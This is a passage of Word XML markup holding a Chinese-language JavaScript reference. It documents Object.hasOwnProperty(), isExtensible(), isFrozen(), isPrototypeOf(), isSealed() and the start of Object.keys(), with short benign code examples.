        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object.hasOwnProperty(propname)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>propname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含对象的属性名的字符串。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如果对象有一个指定名字的非继承的属性则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果该对象没有指定名字的属性，或者这个属性是从它的原型对象继承而来的，则返回</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如同第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章描述的，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以有自己的属性，也可以从它们的原型对象那儿继承属性。</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供一个识别继承属性和非继承的本地属性的方法。</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o=new Object();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=3.14;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个非继承的本地属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("x");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的本</w:t>
      </w:r>
      <w:r>
        <w:t>地属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("y");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>没有属性</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("toString");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>属性是继承属性</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Function.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="730" w:name="Object_isExtensible__"/>
      <w:r>
        <w:t>Object.isExtensible()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="730"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断某个对象上是否可以添加新属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isExtensible(o)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待检查可扩展性的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果可以向该对象添加新属性则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</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如果可以向一个对象添加新的属性，则称它为可扩展的。所有对象在创建后都是可扩展的，直到它们被传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是对象的方法，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={};//</w:t>
      </w:r>
      <w:r>
        <w:t>新创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isExtensible(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：它是可扩展的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.preventExtensions(</w:t>
      </w:r>
      <w:r>
        <w:t>o);//</w:t>
      </w:r>
      <w:r>
        <w:t>将它设置为不可扩展</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isExtensible(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：现在它不可扩展了</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Object.isFrozen()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="731" w:name="Object_isFrozen__"/>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断对象是否不可改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isFrozen(o)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待检测的对象。</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如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>已冻结并不改变则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</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如果一个对象的所有非继承属性（除了那些带</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法的）都为只读，或者它是封闭的（</w:t>
      </w:r>
      <w:r>
        <w:t>sealed</w:t>
      </w:r>
      <w:r>
        <w:t>），则它处于冻结状态。如果可以向一个对象添加新的（非继承的）属性，并且不可删除现有的（非继承的）属性，则称它为封闭的。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
      <w:r>
        <w:t>检测它的参数是否为冻结状态。对象一旦冻结就不能再解冻。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>冻结一个对象的常用方法为将它传给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以这样冻结一个对象：将它传给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>，然后用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>来将</w:t>
      </w:r>
      <w:r>
        <w:t>它所有的属性设置为只读并且不可删除的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是在对象上调用的方法，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isExtensible()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="Object_isPrototypeOf__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.isPrototypeOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="732"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断当前对象是否为另一个对象的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>object.isPrototypeOf(o)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任意对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个对象，或</w:t>
      </w:r>
      <w:r>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型则返回</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如第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章描述的，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象从它们的原型对象中继承属性。对象的原型通过</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性指向创建并初始化该对象的构造函数。</w:t>
      </w:r>
      <w:r>
        <w:t>isPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供一种判断某个对象是否为另一个对象的原型的方法。这个技术可用于判断对象的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new Object();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.isPrototypeOf</w:t>
      </w:r>
      <w:r>
        <w:t>(o)//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Function.prototype.isPrototypeOf(o.toString);//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.isPrototypeOf([1,2,3]);//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3]</w:t>
      </w:r>
      <w:r>
        <w:t>是一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>执行类似检测的另一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(o.constructor==Object);//true:o</w:t>
      </w:r>
      <w:r>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(o.toString.constructor==Function);//true:o.toString</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>原型对象也有自己的原型。下面的调用返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，说明函数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不仅从</w:t>
      </w:r>
      <w:r>
        <w:t>Function.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>而且从</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.isPrototypeOf(Function.prototype);</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Function.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="733" w:name="Object_isSealed__"/>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="733"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断一个对象的属性是否可添加或删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.isSealed(o)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lastRenderedPageBreak/>
        <w:t>待检测的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是封闭的则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</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如果不可以向一个对象添加新的（非继承的）属性，并且现有的（非继承的）属性不可删除，则称它为封闭的。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isSealed()</w:t>
      </w:r>
      <w:r>
        <w:t>检测它的参数是否为封闭对象。对象一旦封闭，将没有办法解封。封闭一个对象的常用方法是将它传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以这样封闭一个对象：将它传入</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventEx</w:t>
      </w:r>
      <w:r>
        <w:t>tensions()</w:t>
      </w:r>
      <w:r>
        <w:t>，再使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>来将将它的所有属性设置为不可删除的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是在一个对象上调用的方法，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isExtensible()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="734" w:name="Object_keys__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Object.keys()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="734"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回自有的可枚举属性名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Obje</w:t>
      </w:r>
      <w:r>
        <w:t>ct.keys(o)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一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的所有可枚举自有（非继承）属性的名字的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
